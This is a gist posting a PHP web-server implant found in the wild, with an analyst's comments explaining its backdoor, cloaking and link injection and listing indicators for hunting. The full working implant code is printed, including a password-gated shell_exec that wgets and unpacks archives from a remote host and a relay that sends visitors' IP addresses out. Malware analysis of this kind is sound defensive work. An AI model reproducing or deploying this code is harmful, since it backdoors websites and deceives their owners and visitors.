
@michalsen
Created August 9, 2016 12:33
Hack found in wild
// ANALYST NOTE: this is PHP, not Perl. The listing is a captured web-server
// implant shown for analysis; the text between the quotes reads as already
// decoded PHP rather than base64, and it contains unescaped double quotes, so
// the wrapper as posted would not parse. Presumably the poster pasted the
// decoded payload back into the original wrapper -- confirm against the
// infected file before relying on the wrapper form.
//
// Behaviour visible in the listing below:
//   1. A password-gated POST channel ("pppp_check", "p", "pa") that runs shell
//      commands to download and unpack an archive into a hidden directory.
//   2. Cloaking: crawler User-Agents get cached content from that directory,
//      visitors arriving from a search engine get a page relayed from a remote
//      host, everyone else gets a fake "404 Not Found".
//   3. Link injection: on URLs with no cache entry, anchors in the site's own
//      page are overwritten with links read from a local list file.
//
// Indicators taken from the listing, useful for log and file-system hunting:
// POST field "pppp_check"; response markers "###UPDATING_FILES###" and
// "###WORKED###"; a dot-directory named md5(host) under the temp dir; the file
// "fff.sess"; outbound HTTP to the base64-encoded domain and its "update."
// subdomain.
//
// set_time_limit(0) removes PHP's execution time limit for this request.
print (base64_decode("set_time_limit(0);
// Fetches $url with cURL and returns whatever curl_exec() yields: the response
// body as a string (CURLOPT_RETURNTRANSFER is set), or its failure value.
// $useragent defaults to a desktop Chrome User-Agent string; callers may pass
// another one.
function get_page_by_curl($url,$useragent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36"){
$ch = curl_init ();
curl_setopt ($ch, CURLOPT_URL,$url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
// Give up after 30 seconds.
curl_setopt ($ch, CURLOPT_TIMEOUT, 30);
// Certificate and host-name verification are both switched off, so an HTTPS
// peer is accepted without authentication.
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_USERAGENT, $useragent);
$result = curl_exec ($ch);
curl_close($ch);
return $result;
}
// Main body of the implant. Two paths: an operator path when the POST field
// "pppp_check" is non-empty, and a visitor path otherwise.
$doorcontent="";
// Operator command selector; "@" suppresses the notice when the field is absent.
$x=@$_POST["pppp_check"];
// Hard-coded MD5 digest that the operator's password must hash to.
$md5pass="e5e4570182820af0a183ce1520afe43b";
$host=@$_SERVER["HTTP_HOST"];
$uri=@$_SERVER["REQUEST_URI"];
// Every "www." occurrence is removed, so both host forms share one cache key.
$host=str_replace("www.","",$host);
// Per-site key: names the hidden cache directory and the update archive.
$md5host=md5($host);
$urx=$host.$uri;
// Per-URL key: names the cache file for the requested page.
$md5urx=md5($urx);
// Working directory: the system temp dir when available and a directory,
// otherwise the directory of the infected file.
if (function_exists('sys_get_temp_dir')) {$tmppath = sys_get_temp_dir();if (!is_dir($tmppath)){ $tmppath = (dirname(__FILE__)); } } else { $tmppath = (dirname(__FILE__));}
// Hidden cache directory "<tmp>/.<md5(host)>/" -- a file-system indicator.
$cdir=$tmppath."/.".$md5host."/";
// Remote host, stored base64-encoded; decodes to mag1cw0rld[.]com (defanged).
$domain=base64_decode("bWFnMWN3MHJsZC5jb20=");
if ($x!=""){
// --- Operator path ---
// Gate: md5 of the base64-decoded POST field "p" must equal $md5pass,
// otherwise the script returns without output.
$p=md5(base64_decode(@$_POST["p"]));
if ($p!=$md5pass)return;
$pa=@$_POST["pa"];
// Commands "2" and "4" both refresh the cache; "2" deletes the old one first.
if (($x=="2")||($x=="4")){
echo "###UPDATING_FILES###\n";
if ($x=="2"){
$cmd="cd $tmppath; rm -rf .$md5host";
echo shell_exec($cmd);
}
// The archive is fetched over plain HTTP from update.<domain> and unpacked in
// the working directory; the listing shows no integrity check on it.
$cmd="cd $tmppath; wget http://update.$domain/arc/$md5host.tgz -O 1.tgz; tar -xzf 1.tgz; rm -rf 1.tgz";
if ($pa!=""){
// "pa" is coerced to a number before it is placed in the command line and
// selects the archive "<md5host>_<pa>.tgz" instead.
$pa+=0;
$cmd="cd $tmppath; wget http://update.$domain/arc/".$md5host."_".$pa.".tgz -O 1.tgz; tar -xzf 1.tgz; rm -rf 1.tgz";
}
// Shell output is echoed back to the operator.
echo shell_exec($cmd);
exit;
}
// Command "3" only prints a marker -- it looks like a liveness check.
if ($x=="3"){
echo "###WORKED###\n";exit;
}
}else{
// --- Visitor path ---
// Cache file for this exact host+URI.
$curx=$cdir.$md5urx;
if (@file_exists($curx)){
// Cache record: five fields separated by "|||"; the third is base64 content.
@list($IDpack,$mk,$doorcontent,$pdf,$contenttype)=@explode("|||",@file_get_contents($curx));
$doorcontent=@base64_decode($doorcontent);
$bot=0;
$se=0;
// NOTE(review): $mobile is set below but never read in this listing.
$mobile=0;
// Classify the request: crawler by User-Agent, mobile by User-Agent,
// search-engine visitor by Referer.
if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\.ru|crawler|baiduspider#i", @$_SERVER["HTTP_USER_AGENT" ]))$bot=1;
if (preg_match("#android|symbian|iphone|ipad|series60|mobile|phone|wap|midp|mobi|mini#i", @$_SERVER["HTTP_USER_AGENT" ]))$mobile=1;
if (preg_match("#google|bing\.com|msn\.com|ask\.com|aol\.com|altavista|search|yahoo|conduit\.com|charter\.net|wow\.com|mywebsearch\.com|handycafe\.com|babylon\.com#i", @$_SERVER["HTTP_REFERER" ]))$se=1;
// Crawlers are served the cached content, with a Content-Type chosen by the
// numeric fourth field (1 PDF, 2 PNG, 3 XML, 4 custom header lines).
if ($bot) {
$pdf+=0;
if ($pdf==1){
header("Content-Type: application/pdf");
}
if ($pdf==2){
header("Content-Type: image/png");
}
if ($pdf==3){
header("Content-Type: text/xml");
}
if ($pdf==4){
// Fifth field: base64 text, one raw response header per non-empty line.
$contenttype=@base64_decode($contenttype);
$types=explode("\n",$contenttype);
foreach($types as $val){
$val=trim($val);
if($val!="")header($val);
}
}
echo $doorcontent;exit;
}
// Search-referred visitors get the body returned by lp.php on the remote host.
// The request carries the cache fields, both md5 keys and the visitor's IP
// address, and reuses the visitor's own User-Agent.
if ($se) {echo get_page_by_curl("http://$domain/lp.php?ip=".$IDpack."&mk=".rawurlencode($mk)."&d=".$md5host."&u=".$md5urx."&addr=".$_SERVER["REMOTE_ADDR"],@$_SERVER["HTTP_USER_AGENT"]);exit;}
// Everyone else receives a hand-built 404 page, so a direct visit to the URL
// shows nothing. REQUEST_URI and HTTP_HOST are echoed into it without escaping.
header($_SERVER['SERVER_PROTOCOL'] . " 404 Not Found");
echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">' . "\n";
echo '<html><head>' . "\n";
echo '<title>404 Not Found</title>' . "\n";
echo '</head><body>' . "\n";
echo '<h1>Not Found</h1>' . "\n";
echo '<p>The requested URL ' . $_SERVER['REQUEST_URI'] . ' was not found on this server.</p>' . "\n";
echo '<hr>' . "\n";
echo '<address>' . $_SERVER['SERVER_SOFTWARE'] . ' PHP/' . phpversion() . ' Server at ' . $_SERVER['HTTP_HOST'] . ' Port 80</address>' . "\n";
echo '</body></html>';
exit;
}else{
// No cache entry for this URL: request the same host+URI over HTTP and use the
// response as the page body. NOTE(review): how that nested request avoids
// re-entering this code is not visible in the listing.
$crurl="http://".@$_SERVER['HTTP_HOST'].@$_SERVER['REQUEST_URI'];
$buf=get_page_by_curl($crurl);
// Link list file inside the hidden directory; each line is "url|||anchor text".
$curx=$cdir."fff.sess";
if (@file_exists($curx)){
$links=@file($curx,FILE_SKIP_EMPTY_LINES|FILE_IGNORE_NEW_LINES);
// $c is the highest index to use; capped at 20, so at most 21 links per page.
$c=@count($links)-1;
shuffle($links);
if ($c>20)$c=20;
// Matches whole <a ...>...</a> elements in the fetched page.
$regexp = "<a\s[^>]*href=(\"??)([^\" >]*?)\\1[^>]*>(.*)<\/a>";
if(preg_match_all("/$regexp/siU", $buf, $matches)) {
$zval=$matches[0];
// Both lists are shuffled, so which anchors are overwritten, and with which
// links, varies from one request to the next.
shuffle($zval);
foreach($zval as $val){
if ($c<0)break;
list($l,$anchor)=explode("|||",trim($links[$c]));
$new='<a href="'.$l.'">'.$anchor.'</a>';
// Case-insensitive replace: every occurrence of the matched markup is swapped.
$buf=str_ireplace($val,$new,$buf);
$c--;
}
}
}
// The page is returned to the visitor, modified or not.
echo $buf;
}
}
"));